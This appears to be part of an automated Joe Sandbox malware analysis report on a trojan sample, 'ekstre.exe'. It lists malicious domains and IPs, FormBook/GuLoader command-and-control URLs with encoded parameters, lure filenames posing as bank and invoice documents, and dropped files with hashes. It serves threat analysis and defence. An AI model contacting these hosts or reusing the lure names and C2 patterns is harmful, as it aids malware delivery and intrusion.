http://www.fluffyjet.online/mi94/www.leqidt.tax	explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.bellvaniamail.com/mi94/www.textare.net	explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.textare.net/mi94/	explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.crosswalkconsulting.co.uk	explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.crosswalkconsulting.co.uk/mi94/www.bellvaniamail.com	explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com/v1/news/Feed/Windows?:	explorer.exe, 00000002.00000003.2593638979.000000000D037000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1091461634.000000000D037000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.5868063058.000000000D037000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.foreca.com	explorer.exe, 00000002.00000000.1078901792.0000000004CF8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.5853522961.0000000004CF8000.00000004.00000001.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.53.179.90	www.furniture-61686.com	Germany	61969	TEAMINTERNET-ASDE	true
213.186.33.5	www.laxmi.digital	France	16276	OVHFR	true
185.53.179.91	www.credit-cards-54889.com	Germany	61969	TEAMINTERNET-ASDE	true
76.223.105.230	irestoreart.com	United States	16509	AMAZON-02US	true
122.201.64.145	couragetokingdom.com	Australia	38719	DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU	true
15.197.142.173	canadianbreederprogram.com	United States	7430	TANDEMUS	true
195.179.237.158	funtime28.online	Germany	6659	NEXINTO-DE	true
23.227.38.74	shops.myshopify.com	Canada	13335	CLOUDFLARENETUS	true
2.16.241.97	unknown	European Union	20940	AKAMAI-ASN1EU	false
23.27.72.143	www.peterslawonline.com	United States	18779	EGIHOSTINGUS	true
192.229.221.95	unknown	United States	15133	EDGECASTUS	false
34.102.136.180	bizformspro.com	United States	15169	GOOGLEUS	false
34.138.169.8	unknown	United States	2686	ATGS-MMD-ASUS	true
198.54.117.215	parkingpage.namecheap.com	United States	22612	NAMECHEAP-NETUS	false

General Information

Joe Sandbox Version:	37.0.0 Beryl
Analysis ID:	837866
Start date and time:	2023-03-30 10:33:07 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 17m 24s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	ekstre.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@520/19@25/14
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 25.1% (good quality ratio 23.2%) Quality average: 72.8% Quality standard deviation: 29.4%
HCA Information:	Successful, ratio: 59% Number of executed functions: 46 Number of non-executed functions: 254
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): WMIADAP.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 51.124.57.242, 51.105.236.244
Excluded domains from analysis (whitelisted): client.wns.windows.com, wdcpalt.microsoft.com, fs.microsoft.com, login.live.com, wd-prod-cp-eu-west-1-fe.westeurope.cloudapp.azure.com, settings-win.data.microsoft.com, wdcp.microsoft.com, wd-prod-cp.trafficmanager.net, wd-prod-cp-eu-west-3-fe.westeurope.cloudapp.azure.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.53.179.90	popis_proizvoda_pdf.exe	Get hash	malicious	FormBook, DBatLoader, Play	Browse	www.mid-size-suv-87652.com/kmge/
	Ziraat_Bankasi_Swift_Mesaji.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.furniture-61686.com/mi94/?w88pk=c9XLkKzZuO0py6g1xPdswXMX5NoX1FOKmat/CxXpy/HRSPu3IeXDT300PcCDZZ6h5UkV&d2Jtc=7nP4ovT8HZ38
	Ziraat_Bankasi_Swift_Mesaji.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.furniture-42269.com/mi94/?b48LI=EhOhAfF&Lj8DtN=tM0cIu22lGNJS/LLx6gRwRxjNM5U60YmJux6FPvQAEnMOjJPh3bRcysDmxXQITeHVyGL
	dekont.exe	Get hash	malicious	FormBook	Browse	www.car-deals-92924.com/vy03/?j4aXp=9ZyYkocr0rsbsEFn1Hi6t7U9b0MF6qCTAShnN0GUobwOp1gVFaqCm26aA4E3J+5DPP56&fZCH=3filrXc8FLxl
	e-dekont.exe	Get hash	malicious	FormBook	Browse	www.car-deals-92924.com/vy03/?v6AX-=9ZyYkocr0rsbsEFn1Hi6t7U9b0MF6qCTAShnN0GUobwOp1gVFaqCm26aA7knGfp7RqQ9&z8Jt7b=7n6P220Py
	E-Dekont.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.cleaning-services-82507.com/ls20/?i67H=+owhMk/YucilJ2bW37X96/0il6r4b5OhumYTgHz/g/DglzXrOFHbmRKxut2lTfZ7Q+jv&2dnpMv=EPsTJ2
	E-dekont.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.boats-for-sale-33038.com/my24/?1but_F=2dcPt2bHAxG4&1bBl=LE+Bk/1AXsK+2UXPX59CHMY/cAS89YjMEg0D+fQFWnJkbE6AigVDzSJoejMJ8EuJGVTw
	Posta siparisi hk.exe	Get hash	malicious	FormBook	Browse	www.data-science-13819.com/tc10/?v6aTA=LcDUU4duXH7qSXYjQsXn8Nc6wn9aO97uBJdklVUR+aXjXdGdKr0FwWTBkYOddJSPCryk&p2J=eJEpMnL8ttItqVgP
	Sorgulama 22604476, pdf.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.couches-sofas-89554.com/gg5z/?R6FP=tbTnA/XpUA9jvBwE35Dt3FmoWFjNuVgul2YLDA7U/NJ76qzSaPKqnY9+tpKxdmQFAH+RlvnAQ7yw2irmLtIkuUm4iqS+kxbZ6g==&G48tq=HPFH
	Sat#U0131n Alma Emri Metak_JJO-003, PDF.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.couches-sofas-89554.com/gg5z/?0BZH=tbTnA/XpUA9jvBwE35Dt3FmoWFjNuVgul2YLDA7U/NJ76qzSaPKqnY9+tpKxdmQFAH+RlvnAQ7yw2irmLtIkuUm4iqS+kxbZ6g==&6lu4=mZxdA4fHUV
	SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.30690.rtf	Get hash	malicious	FormBook	Browse	www.rv-camper-motorhomes-60954.com/g31s/?l2MD=NMHrzlnjkw+ZGR96elbBPIr6pzBr0K/oylUer7nLtPvi9NvjdnVugpjxkndVyCwmvrpdxw==&8poX1Z=4hFtttAHB
	Formcomp profile survey sheet.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.drainpipecleanerin.com/h4ed/?h48pcz=CTtPJFB&GVp=Vl0fkZnLG42mAxOEpd9tiRw0ellV+YEM1mlAYEZcrshq2bDT62/kq1O+gQ5Q3/Ap4USm
	Payment Advice.xlsx	Get hash	malicious	FormBook	Browse	www.suvsdealsonlinesearchcusweb.com/mc3w/?SXt=7n78gzzX&EL=L1h0ZumtcUGQ6s9MjzA2H4pucUdtdRpbJ6j+WhdlNT59TUUCb4QN+cQmokutKaWx5Mu2PQ==
	Tax payment invoice - Wd, November 17, 2021,pdf.exe	Get hash	malicious	FormBook	Browse	www.lasikeyesurgerysclinicusa.com/e3rs/?7n=FGzXAlPQX+ziauwEw9lrEsouDdvWhs7xeCwdPkwx4d99pG9wGX8btLeGxyYtszqiD9IW&q0DXK=OR-p4BxxYZ
	Tax payment invoice - Wed, November 10, 2021,pdf.exe	Get hash	malicious	FormBook	Browse	www.lasikeyesurgerysclinicusa.com/e3rs/?mf=FGzXAlPQX+ziauwEw9lrEsouDdvWhs7xeCwdPkwx4d99pG9wGX8btLeGxyYtszqiD9IW&S2=s0DxUvpxn2BT
	PURCHASE ORDER 2070121 SN-WS.PDF.EXE	Get hash	malicious	FormBook	Browse	www.mycremationserviceinfousa.com/gno4/?insHKb=KrnDvLDhwJYhg&xXE0=VQMyuSHIaGuXo7pIi2qmmbxpSFNeg+anDW37RbQ2cO58l1nooFQKod7BZYRNxi574Rtk
	Medical Equipment Order 2021.PDF.exe	Get hash	malicious	FormBook	Browse	www.mycremationserviceinfousa.com/gno4/?eL=VQMyuSHIaGuXo7pIi2qmmbxpSFNeg+anDW37RbQ2cO58l1nooFQKod7BZbxd+DpDm0Ej&4hvT=6lzhuB6HBNdXkzO
	Require your Sales Ledger from 01-April-2020.exe	Get hash	malicious	FormBook	Browse	www.seniorlivingcaelderly.com/suod/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.peterslawonline.com	E-DEKONT_pdf.exe	Get hash	malicious	FormBook, GuLoader	Browse	23.27.72.143
	Ziraat_Bankasi_Swift_Mesaji.exe	Get hash	malicious	FormBook, GuLoader	Browse	23.27.72.143
	Ziraat_Bankasi_Swift_Mesaji.exe	Get hash	malicious	FormBook, GuLoader	Browse	23.27.72.143
parkingpage.namecheap.com	5wQUsLdtQY.exe	Get hash	malicious	FormBook	Browse	198.54.117.216
	Arrival Notice_6648122036.exe	Get hash	malicious	FormBook, GuLoader	Browse	198.54.117.216
	file.exe	Get hash	malicious	FormBook, Play	Browse	198.54.117.217
	rBillOfQuantity.exe	Get hash	malicious	FormBook, Play	Browse	198.54.117.212
	lmK0ia3dYS.exe	Get hash	malicious	FormBook, Play	Browse	198.54.117.218
	E-DEKONT_pdf.exe	Get hash	malicious	FormBook, GuLoader	Browse	198.54.117.212
	Ziraat_Bankasi_Swift_Mesaji.exe	Get hash	malicious	FormBook, GuLoader	Browse	198.54.117.217
	Ziraat_Bankasi_Swift_Mesaji.exe	Get hash	malicious	FormBook, GuLoader	Browse	198.54.117.212
	E-dekont.exe	Get hash	malicious	FormBook, GuLoader	Browse	198.54.117.211
	XBAo84Asbf.exe	Get hash	malicious	FormBook	Browse	198.54.117.217
	FrZzJOJLcA.exe	Get hash	malicious	FormBook	Browse	198.54.117.212
	5JtW1rP950.exe	Get hash	malicious	FormBook	Browse	198.54.117.215
	Ziraat_Bankasi_Swift_Mesaji.exe	Get hash	malicious	FormBook, GuLoader	Browse	198.54.117.217
	Tekopa-20230316pdf.exe	Get hash	malicious	FormBook	Browse	198.54.117.216
	z23Zahlung.exe	Get hash	malicious	FormBook	Browse	198.54.117.212
	TRANSFI1990869320230401.vbs	Get hash	malicious	FormBook	Browse	198.54.117.211
	VKNJwE5C9M.exe	Get hash	malicious	FormBook	Browse	198.54.117.218
	W708aBFupP.exe	Get hash	malicious	FormBook	Browse	198.54.117.210
	rekstre.exe	Get hash	malicious	FormBook, GuLoader	Browse	198.54.117.217
	E-dekont.exe	Get hash	malicious	FormBook, GuLoader	Browse	198.54.117.216
www.furniture-61686.com	Ziraat_Bankasi_Swift_Mesaji.exe	Get hash	malicious	FormBook, GuLoader	Browse	185.53.179.90

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
OVHFR	TTCopy-240323-PDF.exe	Get hash	malicious	FormBook	Browse	145.239.252.49
	quotation.exe	Get hash	malicious	AgentTesla	Browse	5.135.220.43
	achtung.html	Get hash	malicious	Unknown	Browse	51.222.114.20
	TNT_Original_Invoice.exe	Get hash	malicious	Remcos	Browse	51.75.209.245
	aLrUi0lW59.exe	Get hash	malicious	Laplas Clipper, Stealc, Vidar	Browse	51.195.166.203
	FedEx Address e-Form.html	Get hash	malicious	Unknown	Browse	147.135.71.233
	6Z8m42DCVd.elf	Get hash	malicious	Mirai	Browse	192.99.71.233
	QUOTATION.exe	Get hash	malicious	FormBook, GuLoader, Play	Browse	94.23.162.163
	I8Am0UQm04.exe	Get hash	malicious	RedLine	Browse	51.210.161.21
	https://norggfrt.s3.eu-west-3.amazonaws.com/NineeeerrrBighfghtctrttyrtfghghhghfgofghfginrr.html	Get hash	malicious	Phisher	Browse	146.59.116.128
	Rh7oVV7WuG.elf	Get hash	malicious	Mirai	Browse	198.27.93.37
	Monday March 2023 Request Complete.htm__ Signed_Copy_5111107658003272.htm	Get hash	malicious	HTMLPhisher	Browse	51.81.46.209
	wk1lMvJGNW.exe	Get hash	malicious	Xmrig	Browse	51.68.143.81
	TNT_Original_Invoice.exe	Get hash	malicious	Remcos	Browse	51.75.209.245
	file.exe	Get hash	malicious	RedLine	Browse	51.210.161.21
	https://bit.ly/3SUVK4P	Get hash	malicious	GRQ Scam	Browse	167.114.119.127
	Scientize.exe	Get hash	malicious	FormBook, GuLoader	Browse	51.89.75.17
	https://peyg.ir/429#cl/27574_md/3/27/661/20/46354	Get hash	malicious	Phisher	Browse	51.222.205.172
	https://peyg.ir/429#cl/27574_md/3/27/661/20/46354	Get hash	malicious	Phisher	Browse	51.222.205.172
	Dissensers.exe	Get hash	malicious	FormBook, GuLoader	Browse	51.89.75.17
TEAMINTERNET-ASDE	popis_proizvoda_pdf.exe	Get hash	malicious	FormBook, DBatLoader, Play	Browse	185.53.179.90
	E-DEKONT_pdf.exe	Get hash	malicious	FormBook, GuLoader	Browse	185.53.179.91
	Ziraat_Bankasi_Swift_Mesaji.exe	Get hash	malicious	FormBook, GuLoader	Browse	185.53.179.173
	Ziraat_Bankasi_Swift_Mesaji.exe	Get hash	malicious	FormBook, GuLoader	Browse	185.53.179.91
	Kf5gI5Ttry.exe	Get hash	malicious	FormBook	Browse	185.53.179.171
	customer's Scan-Copy.exe	Get hash	malicious	FormBook	Browse	185.53.179.170
	Ziraat_Bankasi_Swift_Mesaji.exe	Get hash	malicious	FormBook, GuLoader	Browse	185.53.179.174
	DHLINV000156.exe	Get hash	malicious	FormBook, GuLoader	Browse	185.53.177.54
	DHLIN00178.exe	Get hash	malicious	FormBook, GuLoader	Browse	185.53.177.54
	http://go.staticvisit.net	Get hash	malicious	Unknown	Browse	185.53.178.30
	#U00f6deme_formu_0001.exe	Get hash	malicious	FormBook	Browse	185.53.178.52
	rocee6632.exe	Get hash	malicious	FormBook	Browse	185.53.179.94
	REQUEST_FOR_QUOTE_FORM.exe	Get hash	malicious	FormBook	Browse	185.53.179.170
	http://321creditcards.com	Get hash	malicious	Unknown	Browse	185.53.178.30
	TRANSFI1990869320230401.vbs	Get hash	malicious	FormBook	Browse	185.53.179.92
	http://fgoogle.de	Get hash	malicious	Unknown	Browse	185.53.178.50
	INTHIST_230714122537.vbs	Get hash	malicious	FormBook	Browse	185.53.179.170
	SKM_CE_06032023.bat.exe	Get hash	malicious	FormBook, GuLoader	Browse	185.53.179.170
	z37OrdemdeComprapdf.exe	Get hash	malicious	FormBook	Browse	185.53.179.173
	https://loudsjack.com	Get hash	malicious	Unknown	Browse	185.53.179.30

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsrCFD6.tmp\System.dll	E-DEKONT_pdf.exe	Get hash	malicious	FormBook, GuLoader	Browse
	E-dekont_pdf.exe	Get hash	malicious	FormBook, GuLoader	Browse
	Ziraat_Bankasi_Swift_Mesaji.exe	Get hash	malicious	FormBook, GuLoader	Browse
	E-DEKONT_pdf.exe	Get hash	malicious	GuLoader	Browse
	E-dekont_pdf.exe	Get hash	malicious	GuLoader	Browse
	Ziraat_Bankasi_Swift_Mesaji.exe	Get hash	malicious	GuLoader	Browse
	Ziraat_Bankasi_Swift_Mesaji.exe	Get hash	malicious	FormBook, GuLoader	Browse
	Ziraat_Bankasi_Swift_Mesaji.exe	Get hash	malicious	GuLoader	Browse
	Products_List.doc	Get hash	malicious	Unknown	Browse
	TEPO0015922.doc	Get hash	malicious	GuLoader	Browse
	Royalistic.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	Royalistic.exe	Get hash	malicious	GuLoader	Browse
	Annexationist.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	Annexationist.exe	Get hash	malicious	GuLoader	Browse
	file.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	file.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	file.exe	Get hash	malicious	GuLoader	Browse
	file.exe	Get hash	malicious	GuLoader	Browse
	file.exe	Get hash	malicious	AgentTesla, GuLoader	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\nsrCFD6.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\ekstre.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11776
Entropy (8bit):	6.024446974480565
Encrypted:	false
SSDEEP:	192:Vm9rQDenC9VrcK7REgSWOprANupQYLRszDDH/d9CWlXo7U6Wxf:QJQEaVAK7R9SfpjpQYLRszfH/d9CWB1j
MD5:	E23600029D1B09BDB1D422FB4E46F5A6
SHA1:	5D64A2F6A257A98A689A3DB9A087A0FD5F180096
SHA-256:	7342B73593B3AA1B15E3731BFB1AFD1961802A5C66343BAC9A2C737EE94F4E38
SHA-512:	C971F513142633CE0E6EC6A04C754A286DA8016563DAB368C3FAC83AEF81FA3E9DF1003C4B63D00A46351A9D18EAA7AE7645CAEF172E5E1D6E29123AB864E7AC
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: E-DEKONT_pdf.exe, Detection: malicious, Browse Filename: E-dekont_pdf.exe, Detection: malicious, Browse Filename: Ziraat_Bankasi_Swift_Mesaji.exe, Detection: malicious, Browse Filename: E-DEKONT_pdf.exe, Detection: malicious, Browse Filename: E-dekont_pdf.exe, Detection: malicious, Browse Filename: Ziraat_Bankasi_Swift_Mesaji.exe, Detection: malicious, Browse Filename: Ziraat_Bankasi_Swift_Mesaji.exe, Detection: malicious, Browse Filename: Ziraat_Bankasi_Swift_Mesaji.exe, Detection: malicious, Browse Filename: Products_List.doc, Detection: malicious, Browse Filename: TEPO0015922.doc, Detection: malicious, Browse Filename: Royalistic.exe, Detection: malicious, Browse Filename: Royalistic.exe, Detection: malicious, Browse Filename: Annexationist.exe, Detection: malicious, Browse Filename: Annexationist.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./@t.k!..k!..k!..9T..l!.. Y..l!..k!..x!...T..o!...T..j!...T..j!...T..j!..Richk!..........................PE..L.....c.........."!....."...................@...............................p............@..........................@.......A..P............................`.......................................................@..X............................text...+!.......".................. ..`.rdata.......@.......&..............@..@.data...D....P.......*..............@....reloc.......`.......,..............@..B........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\DORME.ini

Download File

Process:	C:\Users\user\Desktop\ekstre.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	31
Entropy (8bit):	4.244518891032036
Encrypted:	false
SSDEEP:	3:UkE74OvrMXMAzovn:izMxEvn
MD5:	3000F7F0F12B7139EA28160C52098E25
SHA1:	9D032395F38D341881019B996E591160D542054B
SHA-256:	467B09FF26622746D205628AE325EC9838461BC5FE741B3757BB39DDEC87ECB1
SHA-512:	A76A2F1E3686E2FFD03388EC7DBCD4AFA6AE53CCD3AA40C6FBBF0C994EEE5E2685D0C412F15EC4506C1175F5A84712E1A8B7AE32E6A0327E1BA47321A59E0EE2
Malicious:	false
Preview:	[ManualPaths]..NumEntries=Hai..

C:\Users\user\procharity\Anasarca\Uncompelled\Barton\Skattegldsposterne\MapiProxy_InUse.dll

Download File

Process:	C:\Users\user\Desktop\ekstre.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20920
Entropy (8bit):	6.270129738401503
Encrypted:	false
SSDEEP:	384:35kgh9IGJLE8rIYcnuYPBkvDG/Ghu4aX9lw:pkM9IG9EWIYyusqDGehuDXvw
MD5:	22ACDFF46574615C4EBF05E223A15899
SHA1:	45A3ACFE2D98A8AED780F0A323DA8B2BE366D2B6
SHA-256:	3089869E2C5691A16E1CF677BAB0A9148B688FBC6B69BB9AF949DD5AC009B063
SHA-512:	9D689705A5737F557B8FCC84DB49E1B36EE8E527D8150DA5E8766BA50298CA0791224E90C7DADF9D930EFD4D0E113E387496F03F672C865E6A5785D12C7859BE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....#b.........."!................`................................................t....@A.........................'.......(..d....`..x............2.......p.......&..............................H&...............)...............................text...~........................... ..`.rdata..D.... ......................@..@.data........0.......$..............@....00cfg.......@.......&..............@..@.orpc...<....P.......(.............. ..`.rsrc...x....`.......*..............@..@.reloc.......p.......0..............@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\procharity\Anasarca\Uncompelled\Bechamels\edit-delete-symbolic.symbolic.png

Download File

Process:	C:\Users\user\Desktop\ekstre.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	306
Entropy (8bit):	7.043191953539302
Encrypted:	false
SSDEEP:	6:6v/lhPysvXxGjiybWfxa/ins2zt2chHNXgWB7WkgNOVp:6v/7PXsjZbWfsafzt2EHfaNO7
MD5:	B6CA93585199635C40D931A388646348
SHA1:	6C1D232639CE03FEE5631BE06A30625DE8F177D3
SHA-256:	9A0D13E272689C838840937ED6EE9ED4943808192C62168904CA1037A6D26D7B
SHA-512:	633FB0BFB87934E0B996A48122540D1DD702D148293D5390BDD9D320F41001D98C50EBF5158FAFCEEF554F28DEED1E72ABE86186B5159A7D142505867EA1ED45
Malicious:	false
Preview:	.PNG........IHDR................a....sBIT....\|.d.....IDAT8...1JCA....+."E...ha.i,<@ ...v..r)-r.-r.h...P.A_,.>.&.{Z........3;...0...x.-..w./.i.!^1j#W-.&.0\g......E.IH~..3<a.....U...D..r~...>M..(...c?....\|.V.P.....*.......>......(0...s....&^F..zH~.....5..C.E.,..b...M.E..AO=$.bu..R.N......w].n......IEND.B`.

C:\Users\user\procharity\Anasarca\Uncompelled\Bechamels\format-justify-right.png

Download File

Process:	C:\Users\user\Desktop\ekstre.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	267
Entropy (8bit):	7.025918549235305
Encrypted:	false
SSDEEP:	6:6v/lhPAkbXo76+uUuEOEH7MQkZoV2W2FN/B81QjY/cmtVp:6v/7dX8lCEH7WZoVq5BDjYZt7
MD5:	0F8289422978EAE1ED2243B10D59AAD9
SHA1:	DF216B3C2CB009CB8F7B002616A09B8D2D868EE8
SHA-256:	D0E9ED17E7A5E236CA5C29EA69E7399188874829CE21CC1FA6BD29031DA7E93F
SHA-512:	D3893E73C3EACEE6EFD7547A73F151E16EA1373FCE2AE11F4C1CAEF499C6365898AE24EAF10E180AC9E44265445089A8F8D4ED3ED341AD1FEDBCC0D139A634DD
Malicious:	false
Preview:	.PNG........IHDR................a....IDATx....AFQ...7.F.....r...oX${....m..O.,.P$.{...!..6.f...uu~=.9`hxP^Z].Q....f.g..)..0........m....{....zAWWg...o....S..,....Y5.0...ol.....e@).dB....n@....1...n...?.C.(...H..m..t...1.E1....?_...?... ..l-......;....A.....IEND.B`.

C:\Users\user\procharity\Anasarca\Uncompelled\Bechamels\format-text-strikethrough-symbolic.symbolic.png

Download File

Process:	C:\Users\user\Desktop\ekstre.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	154
Entropy (8bit):	5.814916572909568
Encrypted:	false
SSDEEP:	3:yionv//thPl9vt3lAnsrtxBlldM9zFarZMG4FdLiotoPykkmIn0YJg/S7Mguh1p:6v/lhPys38zFguFd+otYyHmWMrDp
MD5:	5536CE84283606FACBA0D9E8E338B027
SHA1:	08EE3DB8FE5D8CC251960BF74C35B4C5D83FEAE4
SHA-256:	2725BFB59850C31D112AB8813811BABCC6BFFCFA2774FE350F67B5BF4CEE34CA
SHA-512:	285DC55B4B063EA8EF8FC717B755C5A8867DC55CD32F1656D08475F680DE70A81651503DCDEA3C0B340433B3BE1D69947AC92CBA1C59062891E0CDCD690398E5
Malicious:	false
Preview:	.PNG........IHDR................a....sBIT....\|.d....QIDAT8.c`...?...........\.`..\..B.xJ..X.#..O.~&j..j....;v8.a1..t1..F...1@...r.....7.)7...r....IEND.B`.

C:\Users\user\procharity\Anasarca\Uncompelled\Bechamels\mail-mark-junk-symbolic.symbolic.png

Download File

Process:	C:\Users\user\Desktop\ekstre.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	256
Entropy (8bit):	6.751232891471444
Encrypted:	false
SSDEEP:	6:6v/lhPysEQVoBP6ift9B65yHZTtJM1wzsbp:6v/7ZVoJ6iZr/Jcwz+
MD5:	348FDF742C74D33D14BE9088EA09B8AB
SHA1:	1E85BB9ECAF5408F041C07576AB5D92DB6AF1ADD
SHA-256:	0E74FFD35CE31900A583BBA5015F5103B5914694C6C719917551EE9E249A992B
SHA-512:	794272DC3BFE16B9E93887475534B787E6231402BADF5ED37A62F11B6897F038D4C95C1E5414492F148A3FC27C5A5F7CDEB5E4B698B2A0F06EA6B89D06AA6D19
Malicious:	false
Preview:	.PNG........IHDR................a....sBIT....\|.d.....IDAT8...A..0.E..;...B........^.......4d..C $..a......0)......7......S.@.\K.%a."=.....p.. .x'.'..eF. ...6.6. .j.R....e..F....Z.8.....-....!...X.C8..HZ-.......&.......r...3..\|.Y..m._A?......IEND.B`.

C:\Users\user\procharity\Anasarca\Uncompelled\Bechamels\nn.txt

Download File

Process:	C:\Users\user\Desktop\ekstre.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	5987
Entropy (8bit):	5.010162330631242
Encrypted:	false
SSDEEP:	96:i6nJPNV5T7bR/eGswck/SZI9o7JZqXFwKwo/c5zJsJGYsJW8L/c1N7lHvGy/Ynxj:i8Pf5LleGshkaa9o77sFuo/iJsEYsfwq
MD5:	366B85BF575444D20944DB387F94564E
SHA1:	E93FB8C9AE5EA26EB5C128BE27869CF3D3CF8FE4
SHA-256:	E6922E17B7622361BC4D07E76874A919E3095B477ED008986B94F84A931CB22F
SHA-512:	19A7B5C8F4CE681092ED56C78D9DD6BB95367809DB78F905F357859DD797E7E04810B6F0441B3F5EA7E1BF53D4E06CE361400F6899D8A6A54BA4FC58F9D8E991
Malicious:	false
Preview:	.;!@Lang2@!UTF-8!..; 4.45 : Robert Gr.nning..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Norwegian Nynorsk..Norsk Nynorsk..401..OK..Avbryt........&Ja..&Nei..&Lukke..Hjelp....&Hald fram..440..Ja til &alt..N&ei til alt..Stopp..Start p. nytt..&Bakgrunn..&Forgrunn..&Pause..Sett p. pause..Er du sikker p. du vil avbryte?..500..&Fil..&Redigere..&Vis..F&avorittar..Verk&t.y..&Hjelp..540..&Opna..Opna &Inni..Opna &Utanfor..&Vis..&Redigere..Endra &namn..&Kopiere til.....&Flytt til.....&Slett..&Del opp fil.....Set saman filer.....&Eigenskapar..Ko&mmentar..Rekna ut kontrollnummer....Opprett mappe..Opprett fil..&Avslutta..600..&Merk alle..Fjern alle markeringar..&Omvendt markering..Marker.....Fjern markering.....Merk etter type..Fjern markering etter type..700..S&tore ikon..S&m. ikon..&Lista..&Detaljar..730..Assortert..Flat vising..&2 felt..&Verkt.ylinjer..Opna kjeldemappa..Opp eit niv...Mappelogg.....&Oppdatere..750..Arkiv verkt.ylinje..Standard verkt.ylinjer..Store knappar..Vis knappetekst

C:\Users\user\procharity\Anasarca\Uncompelled\Berbers\object-flip-vertical-symbolic.svg

Download File

Process:	C:\Users\user\Desktop\ekstre.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	902
Entropy (8bit):	4.394728085585905
Encrypted:	false
SSDEEP:	24:2dPnnxu3tlj01veUeqVbbKs8RNcsZin4N:cfnFvmqg/RK4N
MD5:	352D57619D95C2B9DCBF97F8856DE9F0
SHA1:	1FA41F676FD27250510F9E6220FBA96497E2DCD5
SHA-256:	ECCBB5E0444C96DD9109D3B3E700A46991BA5962C9AA7808D3072CF0F358FE42
